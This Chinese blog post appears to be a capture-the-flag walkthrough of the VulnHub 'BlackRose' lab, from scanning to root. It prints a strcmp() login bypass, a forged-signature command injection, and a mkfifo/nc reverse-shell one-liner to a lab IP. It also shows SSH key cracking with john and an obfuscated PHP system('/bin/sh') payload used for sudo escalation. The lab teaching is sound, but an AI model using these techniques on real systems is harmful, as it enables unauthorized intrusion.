首页 > 其他分享 >39、BlackRose(VulnHub)

39、BlackRose(VulnHub)

时间:2024-04-28 15:14:09浏览次数:16  
标签:发现 39 BlackRose sudo 用户 whoami VulnHub delx id

BlackRose

一、nmap

image-20240427220437782

image-20240427220444667

image-20240427220452410

image-20240427220619306

二、web渗透

随便看看

image-20240427220735205

注册进去

账号:xxxxxx
密码:xxxxxx

image-20240427220846304

目录爆破

有很多特殊的目录,不过访问后都重定向了

image-20240427221100539

image-20240427221223219

burpsuite改包进admin

查看xxxxxx用户数据包

抓一些xxxxxx用户的一些记录包,看看有什么可用的

signature=&command=id&indexcsrf=3cb58993bfd71f21cff82968ebb6d7958a69fe4cad1450c5c93ee97d51c88f1f

image-20240427221432270

发现有一个indexcsrf参数

尝试hash识别

image-20240427221505717

好像这个用户没用利用价值了

注册admin用户试试

admin用户名已经有了,没戏

image-20240427222120785

抓admin的登入包

image-20240427222759332

利用PHP strcmp()函数绕过进入

image-20240427223252449

通过放我们修改后的数据包后,成功进入admin

image-20240427223346098

不过这个有indexcsrf验证,是有时效期的,我们动作得快

image-20240427223536598

whoami命令执行

重新抓包绕过后发现whoami命令执行

signature=%242y%2410%246VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
&
command=whoami

image-20240428090422211

image-20240428100436011

多次尝试会发现Timeout的问题

image-20240428090533167

重新抓包后,发现只有whoami命令可执行

image-20240428090708150

发现是bcrypt加密方式

image-20240428091504206

发现whoamibcrypt加密

signature=%242y%2410%246VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
url解码:signature=$2y$10$6VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
command=whoami

发现hash解出来只有whoami命令

image-20240428094216360

ncat udp反弹shell

那我们尝试将我们的反弹shell命令拿去bcrypthash加密,然后将hash和命令一同送入

https://www.browserling.com/tools/bcrypt
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.201 44444 >/tmp/f
==>
加密后:$2a$10$B8JaPPc25m8ezXPmHCTSSuZA5t6uI80HdbHjCgmHKVFATiNjdoxNm

image-20240428094626774

我们做了替换后还是无果,而且我们的密文根本没用变化,signature字眼无法修改

image-20240428094901685

直接前端html修改替换

image-20240428095558077

这里我尝试了好多好多次,因为这里的cstf的字眼校验,导致你盗用admin用户的tocken很快就失效了,所以这里一定要快,必要时快照准备

image-20240428100707668

没过一会发现又超时错误了,不过没关系shell还是可以使用的

image-20240428101152126

三、内网渗透

www-data用户初探

随便看看

python -c 'import pty; pty.spawn("/bin/bash")'

image-20240428101301706

计划任务和suid权限

image-20240428101449837

sudo -l => /bin/ld.so

image-20240428101707236

image-20240428101651370

我们用delx用户尝试执行一下这个命令,应该可以拿到delx用户的shell

拿下delx用户的进一步试探

拿下delx用户

image-20240428102001026

sudo -l 和发现ssh密钥文件

image-20240428102335067

搞出id_rsa文件尝试连接,发现还需要密码

image-20240428102619324

ssh密钥爆破

因为我们直接跑id_rsa文件是爆不出的,我们只能够先将文件ssh2john转换后,再进行john爆破

sudo ssh2john id_rsa > id_rsa.hash
sudo john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

doggiedog        (id_rsa) 

image-20240428103230829

delx用户远程登入探测

本机是普通用户的情况下记得要带上sudo

image-20240428103625495

查看delx用户有权限可访问的文件

find / -perm -u=s -type f 2>/dev/null
find / -type f -user delx 2>/dev/null		# 查看delx用户有权限可访问的文件

其中发现这一个比较可疑:/usr/local/.../showPassword

image-20240428104013583

发现井号,不过是虚惊一场

执行/usr/local/.../showPassword文件看看,吓了一跳,但是,只是虚惊一场而已。发现一个像似关键东西,我们记录下来

JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE=

image-20240428104432847

尝试下载showPassword文件

编程语言开放服务器好像不太行,python又没有httpmodule,后面我们就尝试scp传输

image-20240428105352105

ida64.exe逆向分析showPassword文件

image-20240428110434772

我们从中发现类似于密码的东西gqSFGqAJ,我们记录下来

image-20240428110714779

继续,输入gqSFGqAJ看看,啊后面又没了

image-20240428111618994

我们继续追溯过来,发现这个是不是需要什么解密才可以的

image-20240428111529568

最后经过尝试发现是AES encryption

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

image-20240428111741501

竭尽全力回头看

/var/www/html/img/background-image.jpg

在与其他可登入用户测试此密钥后,它对其中任何一个都不起作用。我们继续回到www下面去寻找,果然,发现一个权限比较特殊的目录

image-20240428115025704

scp传输图片隐写分析

sudo scp -i id_rsa [email protected]:/var/www/html/img/background-image.jpg ./
doggiedog

image-20240428115312994

发现需要密码

那么刚刚好,使用刚刚获得的正好可用

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

image-20240428122913439

呃,不过,这又是什么东西

s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR

rot47解密

在线网站:https://dencode.com/cipher/rot47

经过搜索引擎发现和rot47最像

image-20240428123004309

没错,就是这个

DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v#

image-20240428123100496

切换yourname用户继续

xxx用户忽略,这是我后面做测试的用户,与本次环境无关

su yourname
DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v#

image-20240428123321901

user.txt

image-20240428123623146

sudo -l 提权

呃,又出了点问题,貌似直接都无法执行

image-20240428124153318

尝试绕过

既然提示了是File read,那么试试能不能读自己写的危险函数试试,不过尝试后发现应该是靶机上有检测,或者WAF之类的安全防护

image-20240428131407886

感觉有戏

image-20240428131514603

我们把root的shell写进去试试

注意这里bash不行哦

yourname@BlackRose:~$ vim tiquan.php 
yourname@BlackRose:~$ cat tiquan.php 
<?php
(sy.(st).em)('/bin/sh');
?>
yourname@BlackRose:~$ sudo -u root /usr/bin/blackrose
File read~# /home/yourname/tiquan.php
id
whoami

image-20240428131743922

root.txt and over

image-20240428132010805

补充(Netplan网络配置)

【Vulnhub靶场】靶机导入到vmware后获取不到IP - 北の泉 - 博客园 (cnblogs.com)

Ubuntu 通过 Netplan 配置网络教程 - 知乎 (zhihu.com)

标签:发现,39,BlackRose,sudo,用户,whoami,VulnHub,delx,id
From: https://www.cnblogs.com/carmi/p/18163761

相关文章

  • idea启动项目时抛出错误信息Error running 'XXXApplication' Error running XXXApplic
    很多新手小白在启动项目时会出现下面问题,不知道怎么办出现的问题:启动项目时抛出下图错误提示:Errorrunning'XXXApplication'ErrorrunningXXXApplication.Commandlineistoolong.Shortenthecommandlineandrerun. 解决办法:1、直接点击下图位置,进入EditRunConfi......
  • [Err]1114 The table 'xxx' is full 的解决办法
    错误信息[ERR]1114-Thetable'th_exam_paper'isfull解决步骤查看服务器硬盘使用情况df-h数据库所在位置空间已经百分之一百,准备迁移数据库文件迁移mysql数据库文件到挂载盘要将MySQL数据库文件迁移到其他挂载盘,你需要做的是将数据文件复制到新位置,并更新MyS......
  • Bluestein's Algorithm
    Bluestein'sAlgorithm用于当不是\(2\)的整数次幂时对多项式的(I)DFT。考虑现在要求:\[f_m=\sum\limits_{k=0}^{n-1}a_kw^{mk}\]Bluestein的核心思想在于拆\(mk\)。不难证明\(mk=\frac{m(m-1)}{2}+\frac{k(k+1)}{2}-\frac{(m-k)(m-k-1)}{2}\)。......
  • P3920 WC2014 紫荆花之恋
    P3920WC2014紫荆花之恋毒瘤题目,动态点分树。前置科技点替罪羊树高速平衡树(除去fhq_treap和splay之外的所有平衡树)约定\(dis(u,v)\)为原树上\(u,v\)两点间的距离\(siz\)为子树大小思路维护一棵可以动态插入节点的点分树,有点权和边权,求任意两点点权和大于两点......
  • UnicodeDecodeError: 'utf-8' codec can't decode byte 0xa1 in position 0: invalid
    报错:报错信息UnicodeDecodeError:'utf-8'codeccan'tdecodebyte0xa1inposition0:invalidstartbyte指出在尝试使用UTF-8编码解码文件时遇到了问题。这通常发生在文件的编码不是UTF-8时,比如它可能是GBK、GB2312或其他编码。哈工大停用词表可能不是用UTF-8......
  • Host '::1' is not allowed to connect to this MariaDB server
    登陆时报错,运行mysql-uroot-p 输入密码后报错ERROR1130(HY000):Host'::1'isnotallowedtoconnecttothisMariaDBserver 不允许连接原因:::1是IPv6下的本地主机地址,类似于IPv4下的127.0.0.1,表示本机回环地址。在大多数情况下,::1和localhost是等效的,都指......
  • access数据库批量更新中无法使用replace,出现“表达式中 'replace' 函数未定义”的替代
    如果我们想要批量修改数据库table_name表中aa字段中数据,将“|bbbb”删除sql的批量更新中,通用语法是:UPDATEtable_nameSETaa=REPLACE(aa,'|bbbb','')但是,如果是access数据库,就可能出现以下的报错信息:MicrosoftJETDatabaseEngine错误'80040e14'表达式中'replace'函......
  • 顺序栈十进制转十六进制,还有键盘输入一个包括 '(' 和 ')' 的字符串string ,判断字符串
    设计一个进制转换程序,使用顺序栈设计一个把十进制数转换为十六进制数的接口,实现当通过键盘输入一个非负的十进制数,可以在终端输出对应的十六进制数。*@brief :十进制转十六进制*@param :@Segstackt*Manager:地址* @unsignedintData:转换的值*@re......
  • 一道关于顺序栈的笔试题:判断一个包含'('和')'的字符串是否有效
    若有一个包括'('和')'的字符串string,判断字符串是否有效。要求设计算法实现检查字符串是否有效,有效的字符串需满足以下条件:A.左括号必须用相同类型的右括号闭合。B.左括号必须以正确的顺序闭合。C.每个右括号都有一个对应的相同类型的左括号。思路图:参考代码:boolSeq......
  • SpringBoot+MyBatisPlus报错 Invalid value type for attribute 'factoryBeanObjectTy
    依赖版本org.springframework.boot:spring-boot-starter-web:3.2.5com.baomidou:mybatis-plus-boot-starter:3.5.5错误Invalidvaluetypeforattribute'factoryBeanObjectType'问题原因:这个问题是由于依赖传递导致,在MyBatis起步依赖中的myBatis-spring版本过低,导致程......